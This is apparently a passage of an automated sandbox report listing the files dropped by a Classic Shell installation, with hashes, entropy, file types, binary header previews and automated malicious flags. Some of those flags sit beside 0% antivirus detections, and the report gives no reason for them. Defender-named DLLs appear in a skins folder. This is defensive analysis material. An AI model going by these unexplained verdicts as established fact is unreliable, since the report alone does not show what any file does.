                                                  Malicious:false
                                                  Preview:.; This file contains all localized text for Classic Explorer. There is one section per language...; Every section contains text lines in the form of <key> = <string>...; Which section is used depends on the current OS setting. If a key is missing from the language section..; it will be searched in the [default] section. In some cases more than one language can be used...; For example a Japanese system may use English as a secondary language. In that case the search order..; will be [ja-JP] -> [en-US] -> [default]...;..; =============================================================================......[default]..Toolbar.Settings = Classic Explorer Settings......[ar-SA] - Arabic (Saudi Arabia)..Copy.Cancel = ..... .......Copy.More = ...........Copy.CopyHere = .&.. ... ... ........Copy.MoveHere = .&.. ... ... ........Copy.Title = ..... ....... .......Copy.Subtitle = ..... ... ...... ... ... .... '%s

                                                  C:\Program Files\Classic Shell\HISTORY.txt

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):30324
                                                  Entropy (8bit):4.099883635478519
                                                  Encrypted:false
                                                  SSDEEP:768:HU4oBvxuMlxssM5Rw3qR/4D/ZxKvcB7KZefKwaNg:HU4oBJ5qR/W/Zx/B9vaNg
                                                  MD5:6B5068DB15113F6DC950330DE7BDD3DC
                                                  SHA1:D5C4F6CB4FD5BD3BC64E4816D593841912030D42
                                                  SHA-256:AA95EA793F6AB60080982BBE1AA3E9A9EB0E16A85C9DF45CD2F27E738C53E3C6
                                                  SHA-512:CAB6AC0F01DCB500B34CB843B984810D5B268717D62B8DEAF2D2DECAD114B1DEDA0DB9E9DBA8A8716E437FEF57D46D64058EEE8A718CA39A07FAF5ABC4FC6A21
                                                  Malicious:false
                                                  Preview:===============================================================================..== Version 4.3.1 general release (Aug, 2017)..===============================================================================....- Official support for the Creators Update version of Windows 10....- Added a setting to clear icon cache....- Multiple minor improvements and bugfixes....===============================================================================..== Version 4.3.0 general release (Jul, 2016)..===============================================================================....- Official support for the Anniversary Update version of Windows 10....- Fixes for issues found during the 4.2.7 beta....===============================================================================..== Version 4.2.7 beta (May, 2016)..===============================================================================....- Fix for a crash on 32-bit Windows 10 systems....=======================================================

                                                  C:\Program Files\Classic Shell\IE Settings.lnk

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Archive, ctime=Sun Jul 15 15:15:32 2018, mtime=Tue Feb 7 18:51:36 2023, atime=Sun Jul 15 15:15:32 2018, length=104248, window=hide
                                                  Category:dropped
                                                  Size (bytes):1318
                                                  Entropy (8bit):4.456100530133193
                                                  Encrypted:false
                                                  SSDEEP:24:8LqIiRud/RoEAlKNUkMlpAEJKpyvEMa8WhVkMlcqdKLJaSAhAyvEMa8WWyuf:8LHiRud/cIUkMlqEYpyvvZkkMlcqdEyN
                                                  MD5:A93AD8EEEEF5532F9CC99413B6B96793
                                                  SHA1:20F0D35E41E0E7B876D5A066004B09E3E131F50D
                                                  SHA-256:549B0BC14CF9F3BEF7EB7957EB5DCBA86A9C887B8C951F4CC11C015DF6842559
                                                  SHA-512:130E3996606034E3548785B0ED29B2D423F8B27EDFF1FD841B2BE947BB682342950CB86864A97B27257A573EBAF942793FB74EF0258DCBE1FFA74C1542429BB3
                                                  Malicious:false
                                                  Preview:L..................F.... ....*..W.....4.-;...*..W...8............................P.O. .:i.....+00.../C:\.....................1......T.t..PROGRA~1..t.......C.l.T.t....................J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1.....GVs...CLASSI~1..L......oQb.GVs.............................~.C.l.a.s.s.i.c. .S.h.e.l.l.....n.2.8....L.. .CLASSI~2.EXE..R.......L..GVs......o....T...................C.l.a.s.s.i.c.I.E._.3.2...e.x.e.......^...............-.......]....................C:\Program Files\Classic Shell\ClassicIE_32.exe..C.E.d.i.t. .t.h.e. .s.e.t.t.i.n.g.s. .o.f. .t.h.e. .I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r. .t.i.t.l.e. .b.a.r. .a.n.d. .s.t.a.t.u.s. .b.a.r.....\.C.l.a.s.s.i.c.I.E._.3.2...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.l.a.s.s.i.c. .S.h.e.l.l.\.........&................c^...NI..e.2.......`.......X.......developer.........;.3L..,.{b..E...&...S..2.jA..;.3L..,.{b..E...&...S..2.jAo...........1SPS.....Oh.....+'..............D...E.d.

                                                  C:\Program Files\Classic Shell\PolicyDefinitions.zip

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):42014
                                                  Entropy (8bit):7.98271695343675
                                                  Encrypted:false
                                                  SSDEEP:768:7cED9Ol6y+lL4bIPIE7fEUYdxAtitL1QhcnM4O4czzTJ7/TfD:77JOR+lwE/YdxJ1pM4O4kTJ7/n
                                                  MD5:9773AD8D846E70082E18343CA42A12A7
                                                  SHA1:F279150CAD325F91558921161C6699ACD8312EDC
                                                  SHA-256:CB88AE5B29C0413CB7A8C988397B8868329F21BFC70B1A1D0E1B7257316E4DE9
                                                  SHA-512:FCE598CC2C8D912AC55939640BE772804D568E05732E52E2A1D23D9BFD2F7253468128534E7EB4F10B9FDF57FA19C9B4D7F768C1EC02DC5679764AAFF3A62F1A
                                                  Malicious:false
                                                  Preview:PK.........i.L1.....Z.......ClassicExplorer.admx.kO..._.J.;T..y...2+..... .0...PH\.&Mz.....k..\....L,.........8.g.....3....q..:..<......-..h.}..o...@ks....zn..7.....>..Z}..........?.n.....yn=...m/....n.L..Z...0r.{0.:A.....a..F.+..%.|/.......}o.... .Fzw._...p...0/.%.V.....w3d...uV>...P..3..u.^W..._......7'.C.......O...Q.....f......yte..L.r|..W8Y......,.....Zr...o..;K.......m.I......#`_...v........j...W7..'.........X..0X9.&...?...,.T].^.9..L.....I.3...L/D;.L..=.FY.~......n...d...5...-xEo^z...{-....>%^`....B"8...(.|T..!...........!._.uBs....v.{z...7vG.].{.......B...G..A.<.....j.........cV....V.v...|U...J...Xb+Q".gw..@.K.q<.S{6.u.a>.....w3..rGn.[..p.?..F?bR,.4....5.W3=..N..m...uc....[..l}...&..<....f..\.F..."....*. .ea:..{+.+.Oc.bi.9m$.6.P....9...c....C].F......pW.L.W.<......t.}.8vL../.C..#v....F.60E@3.l.\..K.LMM...$...C..F........P.L. ~.U.q.._.>.s.q..tS.tF....iip.F.8....y.d.LY.JT..g...._.....o*.cj.W....W...z.....c...f..+8.[..........:.../.....iH.;.

                                                  C:\Program Files\Classic Shell\Skins\Classic Skin.skin

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70656
                                                  Entropy (8bit):5.579916080865678
                                                  Encrypted:false
                                                  SSDEEP:768:5cAeLn6Cc1ZoHhuGieMKqKf368f8ivaaGNNiiiZ3QMZ2B6mc5sHv42dN0nKsDEDA:a6CcARZ3RaaGNNiiiZ3Wvv7dgKwd9nL
                                                  MD5:AA807C9F20014595E8BFDDF7F6DCA025
                                                  SHA1:198BF64B5052E016272C2257A66E05062884CD39
                                                  SHA-256:B47661C02468DC823350FCD9E348674E9B7A528127DF7D61B4289FEBA492AE03
                                                  SHA-512:125F02C14CB9EB0E929B098B2DB219751A73B5F482FECFBDAD9584491D6AE508A59E6105B015804159024F8EFD686CD5BB1C8676D1FF270A8361252D1B96B9B9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........................................................0......6.....@..........................................................................................................................................................rsrc...............................@..@....................................................................8.......P............................................................................... .......8.......P.......h...............................................................................................................................(.......................8.......................H.......................X.......................h.......................x...........................................................................................................

                                                  C:\Program Files\Classic Shell\Skins\Classic Skin.skin7

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):4.710252310302198
                                                  Encrypted:false
                                                  SSDEEP:768:7LlnHhuGieMKqKf368f8ivaaGNNiiiwmzIimd3QMZ2B6mc5sHv42dN0nKsDEDQdM:9nRZ3RaaGNNiiiwfh3Wvv7dgKwd9nC
                                                  MD5:ED0D00E6A9E83242634F6FFEA8A751F1
                                                  SHA1:A80105BAD9E68EFFC17702C0029568F632F003FC
                                                  SHA-256:992D573A7012C6777D127ED3DC1A5A5343DEE5E30EC7BBC3518ADAF3F28733A8
                                                  SHA-512:AA25791215E419F11858984063A5ED75C1BB3E2A7136CC045E4D88E204687BB16342F954AA411B0F6DDA28550A851DF0E62FC79F574926F5BD237CBAD5EF0CC9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!......................................................................@..........................................................................................................................................................rsrc...............................@..@................................................................(...8.......P...............................................................................(.......@.......X.......p...............................................................................................................0.......................H.......................X.......................h.......................x...................................................................................................................................................

                                                  C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):403816
                                                  Entropy (8bit):6.1451106536127735
                                                  Encrypted:false
                                                  SSDEEP:6144:z9eW9BpN1rKvfwOlWQb1MfMp7ZFfyjCrplIz5qyAlhAXnWPkzfo:zDKv4OlWQpMA7Z0Cr/e89QnWszfo
                                                  MD5:FBAA9986931D1ADEDA07A6EF8F04AB6D
                                                  SHA1:5FB959351940EB94EEF9D8E21D95436B77FEB9A2
                                                  SHA-256:3B96D206B1BF06532440E2DD91B615A6CC8DD21561C252449F3B76FC254E11DF
                                                  SHA-512:A88A56E30BEBF91CDB1382F46E2D095CBD20CA6ACDFBEF1998602AB7C744E6DECB6D80885CCE3CE1F97EBCBBDC5F90A6B192D8BE9C08DD4A2FC95F10AB2CC102
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.u.3..,3..,3..,'..-1..,V..-2..,V..-2..,'..-9..,'..-!..,:.,!..,'..-...,V..-&..,3..,...,'..-]..,'..,2..,'..-2..,Rich3..,........................PE..L.....,......................L.......H............@..........................@.......Q........... ..............................|....0..................h/......,F.....T...........................H...........................`....................text............................... ..`.data....).......$..................@....idata... ......."..................@..@.didat..(.... ......................@....rsrc........0......................@..@.reloc..,F.......H..................@..B................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\Skins\EppManifest.dll

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):165208
                                                  Entropy (8bit):7.110142692986595
                                                  Encrypted:false
                                                  SSDEEP:3072:vMxVQoQqFTs8U+Nwy8bhpgENIf5eeT25+h6+iU:v8s8tNwZhpgEKfEeT6m
                                                  MD5:EBEA28C15DD26C1D0C1944215F0AAE8B
                                                  SHA1:98375B311B8D56DA260961217073B30D1AEFE089
                                                  SHA-256:E36CD8ABDA4C1E71C9E322550ECD3F6B76B1D6ACAD014F7DFA11F72A0ABC674B
                                                  SHA-512:05E17C27A257229BD67096D0E2858C9A120293983F8F79AA9A884F97A4F867A00AD1ED7DEC846EC54F236B44802B7A6C57E752B81277510B90F930BDB6714F11
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d......W.........." .........P...............................................`............`.......................................................... ...<...........`..X%..............T............................................................................rdata..............................@..@.rsrc....<... ...@... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\Skins\Full Glass.skin

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):363520
                                                  Entropy (8bit):6.133549908634759
                                                  Encrypted:false
                                                  SSDEEP:6144:U0AjlUbLwmHNdPEmf7FYbvESQWwYhli61KYCDbg:U0KlUAANdrDFYY/rDbg
                                                  MD5:355ADAA13F7CEF714BFA1143678BADA1
                                                  SHA1:64EE68DAE2709C1F4860343006EDF7949FA684EB
                                                  SHA-256:0015E2E375366BCA981DC6CA6902AAA38C3C8B3F3E5DF9929489A0411C98487E
                                                  SHA-512:3E601F0685BE2216AC5874A727C6E72995A2E0E782E6D877E801F6ADCE3360B7BD80F5860091A42ECFDF1AA326CE2560798D308ADCF77B9B56DD40A75F7F12C4
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.................................................................d....@..........................................................................................................................................................rsrc...............................@..@....................................................................8.......P...............0.......H.......................`.......................x....................................................... .......8.......P.......h...............................................................(.......................@.......X.......p.......................................................................................................................................................................................(...................

                                                  C:\Program Files\Classic Shell\Skins\Metallic.skin7

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):325632
                                                  Entropy (8bit):5.238943133649953
                                                  Encrypted:false
                                                  SSDEEP:1536:RlsvoBtj+J/OM9SFrKZEWD3uGMvl6TFMoRgN6piWhl7KUsRoQNbYeF70LN/zMzVq:bsv0UJGMIFgD4vlW7G0i6PmcEcogvv79
                                                  MD5:3DB77823E2314F47BB700A5D467051F1
                                                  SHA1:4F4456B0A119290E71E4C4D672DD0D6D2C283EDF
                                                  SHA-256:CC75E8DE18B7D2039C412EE66A066C7A6990BA8856E5F13855A513B87140DA5D
                                                  SHA-512:4A80D0A61E04DC053AF1AA16527EC9D604C79911B9A55438C3CDA18FB96546EA1C1EA785DB2DF32CC30AD2F6058095ECCA03F987D606D75918E3282144681A1D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!......................................................................@.............................................X............................................................................................................rsrc...X...........................@..@....................................................................@.......h...............h...................................3.......4.......5...................................................0.......H.......`.......x....................................................... .......8.......P.......h...............................................................(.......@.......X.......p...............................................................................................0.......................H.......................`...

                                                  C:\Program Files\Classic Shell\Skins\Metro.skin

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):89088
                                                  Entropy (8bit):4.487460802182499
                                                  Encrypted:false
                                                  SSDEEP:768:dRG/dn1Yn15+Poix3QMZ2B6mc5sHv42dN0nKsDEDQdmP90nL:/G/dn1Yn15+Px3Wvv7dgKwd9nL
                                                  MD5:A517C1D3B1C4FE97FDE5AAA5C0283DA6
                                                  SHA1:5AB7C793A760E20BDC05F1E4B4763D64C3C186B3
                                                  SHA-256:621576A6BD884368B6163CB57FFE52DDF526FC8EBD7B9614A18E1271A11F15C7
                                                  SHA-512:8511E420071F6DB8A8D23F845B4D3232F5480B4ABBEC0C334057995681AAA4FE794D1325C1E72BAF9CBEC0DCFCF84F9A38C65CA29C87EE009D6A3649D2E61263
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........Z...............................................p......3.....@.............................................@X...........................................................................................................rsrc...@X.......Z..................@..@....................................................................8.......P...............0.......H.......................`.......................x....................................................... .......8.......P.......h...............................................................(.......................@.......X.......p.......................................................................................................................................................................................(...................

                                                  C:\Program Files\Classic Shell\Skins\Metro.skin7

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):139776
                                                  Entropy (8bit):3.616945477969783
                                                  Encrypted:false
                                                  SSDEEP:768:n3Vn1Yn15+PiyiG3QMZ2B6mc5sHv42dN0nKsDEDQdmP90nh:nln1Yn15+PoG3Wvv7dgKwd9nh
                                                  MD5:90C1723A39744441D3031AE75CCB066B
                                                  SHA1:2BB2282126A35613BE03C0568870D59CE8ADE20A
                                                  SHA-256:D7294F246A893A3B762FBF81F0727282A40F34FBD71F29D7497B41F2C347D3E0
                                                  SHA-512:ECF6546C017234B95E5027552CE1EED692DCFC489EFB1EB9A9BF7F12BC0795B19BE0F48805FA4FFB0D163A8A97D0FB0063DD726C062FEFE0EB183CD3219BAF83
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!......... ...............................................0.......t....@..........................................................................................................................................................rsrc............ ..................@..@................................................................8...8.......P.......h.........................................................!.............................0.......H.......`.......x....................................................... .......8.......P.......h...............................................................(.......@.......X.......p........................... .......!...........................................0.......H.......`.......................x...................................................

                                                  C:\Program Files\Classic Shell\Skins\Midnight.skin7

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):183296
                                                  Entropy (8bit):4.553993353339901
                                                  Encrypted:false
                                                  SSDEEP:1536:AfARo95Y8pvln1Yn15+PEnnnnnnng3Wvv7dgKwd9nB:aJdn1Yn15+PEnnnnnnntvv72
                                                  MD5:5BF1B2188DDA108D4FA8BA7CC77C6453
                                                  SHA1:93BB367394AF47BC61BE0611BAEB5B139E037900
                                                  SHA-256:83611F33C8504D20221A33206D2B18B4F9B9FF0832086466DFB331852893A4E8
                                                  SHA-512:6259FBB35363D2794403FAC5189DF1F31C379CEFE347B8DC635FC15E09F8FA7DC94EBCE370779161F9D77E5AA93A40AC3F908B496686EFD2090E577D9FDD1979
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!................................................................G.....@..........................................................................................................................................................rsrc...............................@..@....................................................................8.......P............................................... .................+.....8.......P.......h...............................................................(.......@.......X.......p...............................................................0.......H.......`.......x................................................... ... ...!...8..."...P...#...h...$.......%.......&.......'.......(.......).......*.......+...(.......................@.......X.......p...........

                                                  C:\Program Files\Classic Shell\Skins\MsMpLics.dll

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):25936
                                                  Entropy (8bit):4.328275985676387
                                                  Encrypted:false
                                                  SSDEEP:192:9+DWgAHWglQBEKLO0cCroDBQABJFI6eYIN5vCX01k9z3AzfSXDlG6P:cWgAHWtBEJlDBRJeWUJCR9zUwDM6P
                                                  MD5:4A8B58C88DF1C607A9DF21EE390CA8F8
                                                  SHA1:18B995CA90D74D34975F9DF8E8611F35E7B94E9D
                                                  SHA-256:1A90C01C3FD40E5CEE77F626BF9883B5D276132252E28EE4B6C2C02D9CD30E4C
                                                  SHA-512:1ECCD6FB016C7E43FBE63120A2A43135B17453AF428658E11EFD69F753FEE5A5F227202144CE85840388E138D392F0A528450B37DE23EFE902CC467A5CD4F1DA
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d....f............" .........0...............................................@............`.......................................................... ..0............@..P%..............T............................................................................rdata..............................@..@.rsrc...0.... ... ... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exe

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):587096
                                                  Entropy (8bit):5.955146470563534
                                                  Encrypted:false
                                                  SSDEEP:6144:UoSVOVSccnel+Z/smH98qn3xVPNCqdeAB5l6Hv7YPdr5/NJSFiimiTVVmVVV8VVp:ULOVSpu+Viq3xnJdtn6jUFYNN
                                                  MD5:2776A2B1C9D82F3FEBAA8CA1F5544992
                                                  SHA1:28620B6498EEFA4E411686FEAC1C0E03D66B661D
                                                  SHA-256:D1F81D7C43B522E39F0FD14E1C25F97E7894CEBBE1F43320CBB66BE1528A7A72
                                                  SHA-512:2FBCA83415F5E927B38DBF7064CAAE1CD67EC2ACBA6C00AEB3520F9C8BC3B9DE46329CB57B2D1D9DC7CB33BD89766E6C8C3DC3C1FC6B3DAA885CB50FE64C5E2B
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...................................................................................Rich............................PE..d...+WSF.........."..........P.................@..................................................... ...........................................................6......X%......x...TY..T......................(.......@...............`............................text...L}.......................... ..`.rdata..............................@..@.data...`Q...0...P...0..............@....pdata...6.......@..................@..@.rsrc...............................@..@.reloc..x...........................@..B........................................................................................................................................................................................................................................................

                                                  C:\Program Files\Classic Shell\Skins\Smoked Glass.skin

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):213504
                                                  Entropy (8bit):6.406320997067057
                                                  Encrypted:false
                                                  SSDEEP:1536:WTh4R2u44444GltPGGGGdM414Q44444IRt/dGGGGdGk6CMrvn1Yn15+PsI+3MRK1:2hTPBn1Yn15+P6Vjbvv7x
                                                  MD5:47590B1DEC24EBEEA01F804BFADAC213
                                                  SHA1:4A16D390E05C39DE137392CBA17A51C164FE971F
                                                  SHA-256:D8798D2631DA3F1EC6979D432717B6A281B781213AAA846488568FCE89D850B2
                                                  SHA-512:FDDF1215A77AA8D0DD92952640CBA31D9C719EA6821039734B24A76855AD6948AEA4D5607E308088EF3F8F211A78582A7DE93CFC34C2F6A93BBD252CD27A74B5
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........@...............................................P.......n....@..............................................>...........................................................................................................rsrc....>.......@..................@..@................................................................x...8.......P...............................................0.......................H.......`.......x....................................................... .......8.......P.......h...............................................................................................................................(.......................8.......................H.......................X.......................h.......................x...........................................

                                                  C:\Program Files\Classic Shell\Skins\Windows 8.skin

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):131584
                                                  Entropy (8bit):4.379206172945769
                                                  Encrypted:false
                                                  SSDEEP:1536:ChysRoK62fennnnnnndHHHHHHH13Wvv7dgKwd9nD:XFnnnnnnndHHHHHHH0vv70
                                                  MD5:03DFAFC8BCA897EA07443FF3ECC48F51
                                                  SHA1:86457F8721AED8209DF2FAC5C429F3F329130398
                                                  SHA-256:C08D05FED558D13517A94F2FEC45322242F7EA384FB5E0C38CC993622C8D29E2
                                                  SHA-512:4E320DDE86A273AEF5B7BC4D33D6A3D854B9435E539256CD3DFD2B7AEC5617D8298CF25BE944114380A81881772C5AE2033351E73BED769C7C4401792AE6F98D
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!......................................................................@..........................................................................................................................................................rsrc...............................@..@....................................................................8.......P.......P...............................................................................................0.......H.......`.......x....................................................... .......8.......P.......h...............................................................(.......@.......X.......p...............................................................................................................0.......................H.......................X...

                                                  C:\Program Files\Classic Shell\Skins\Windows 8.skin7

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):167936
                                                  Entropy (8bit):4.00857501777639
                                                  Encrypted:false
                                                  SSDEEP:3072:ZqnnnnnnncJpJpJpJpJpJpJpJSWRWRWRWRWRWRWRW8HHHHHHHiFJFJFJFJFJFJFW:ZObS
                                                  MD5:D718812B48FCE7A18952B790544E0269
                                                  SHA1:9EA842565759FE856A305C52E1413E56AAF62240
                                                  SHA-256:0683ABA24E262C76FE4ED77729CE10B1CCDF29954314D43F23DF5AFC8E5F0AFE
                                                  SHA-512:D36B7009401B0422B5843D1594D5B97BEBFAF7F5518D63A1405B3979DDA4D89179743343B73A0BFDB6F94434EE295F307FCBCF992ADC1E5FCFB700A7EC9AF1C5
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!......................................................................@.............................................t............................................................................................................rsrc...t...........................@..@................................................................X...8.......P.................................................................'.............0.......H.......`.......x....................................................... .......8.......P.......h...............................................................(.......@.......X.......p........................................... .......!......."...0...#...H...$...`...%...x...&.......'........................................................... .......................8...

                                                  C:\Program Files\Classic Shell\Skins\Windows Aero.skin

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):343552
                                                  Entropy (8bit):5.423534189315234
                                                  Encrypted:false
                                                  SSDEEP:6144:iJFB4IMpxItYSGoxtGrV4Q8owgOgJWZxd4p59+aalbt:iJFAZkbt
                                                  MD5:45EFC625726643DC7F8BF04257898A49
                                                  SHA1:A7DF0F5795D70C7449D50280E107C2EC21761396
                                                  SHA-256:304F3B6255F21CD6835D5189D3F8520A5BC041ECD3963FCEBF19922C2423E9D7
                                                  SHA-512:5C44CF99CA98A1F738F248E8D6E492A13F170CFFE6367D57CAC47F57CB73175961278E10A191197F8E337E23C698AD0701B524AC69E0C2D2E8310232FDE6F944
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........<...............................................P......nK....@.............................................<:...........................................................................................................rsrc...<:.......<..................@..@................................................................(...8.......P...............H.......`.......................x....................................................................... .......8.......P.......h...............................................................(.......@.......X.......p...............................................................................................................0.......................H.......................X.......................h.......................x...................

                                                  C:\Program Files\Classic Shell\Skins\Windows Aero.skin7

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):409088
                                                  Entropy (8bit):5.242850309968895
                                                  Encrypted:false
                                                  SSDEEP:6144:NSUV4Q8owgOgJWZxd4FaaXCAftbAQ5OxlBQGPdmC6TP5UQTy/Jd+mBp4pEAbx:NSUDlJbx
                                                  MD5:56DE14A10B76371536260ABC3344B67D
                                                  SHA1:4D898C41FA9FC62B5F9637986C5519A10931D34C
                                                  SHA-256:394411D1759BA920FB2F77156760BB9BEE6E58A36505BF846AE8E687AB1F54E4
                                                  SHA-512:AC586789C5D9F9365E28BC0202E11E1BDE535AEBA1C8F41DA12B69EB054BB793B6DFD52971B52CBC4890D0A2A92527501681667EDE920DF91315F2E2A49D0463
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........<...............................................P.......O....@..............................................:...........................................................................................................rsrc....:.......<..................@..@....................................................................8.......P.......X....................................................................................... .......8.......P.......h...............................................................(.......@.......X.......p...............................................................0.......H.......`.......x....................................................................... .......................8.......................P.......................h...................

                                                  C:\Program Files\Classic Shell\Skins\Windows Basic.skin

                                                  Download File
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):343040
                                                  Entropy (8bit):5.008474119305636
                                                  Encrypted:false
                                                  SSDEEP:1536:5qsRokHNKsKL11GGGNeeee9Edhyeemmm9OOOOca3l68+GGGGNeeee93e+ch0RfaV:wSKZhD6iOaalvv72
                                                  MD5:F80DE60302E457C663786BC4487ADAE2
                                                  SHA1:06A7162C9960D0032C83175E9112F652187E8114
                                                  SHA-256:EA3FF26E86C8FCBE56106978E636251CE7CE06598E86A49817823AB5FFD9BE72
                                                  SHA-512:3446374B6682E1FA09BDEC8CC58AADDEC1D87F648F0C6E64B196857C4D3901EEDC0B7FE2506C9D05C7A9F22117B9DDACDD230D435BF7A6A68ADBAC694E61C858
                                                  Malicious:true
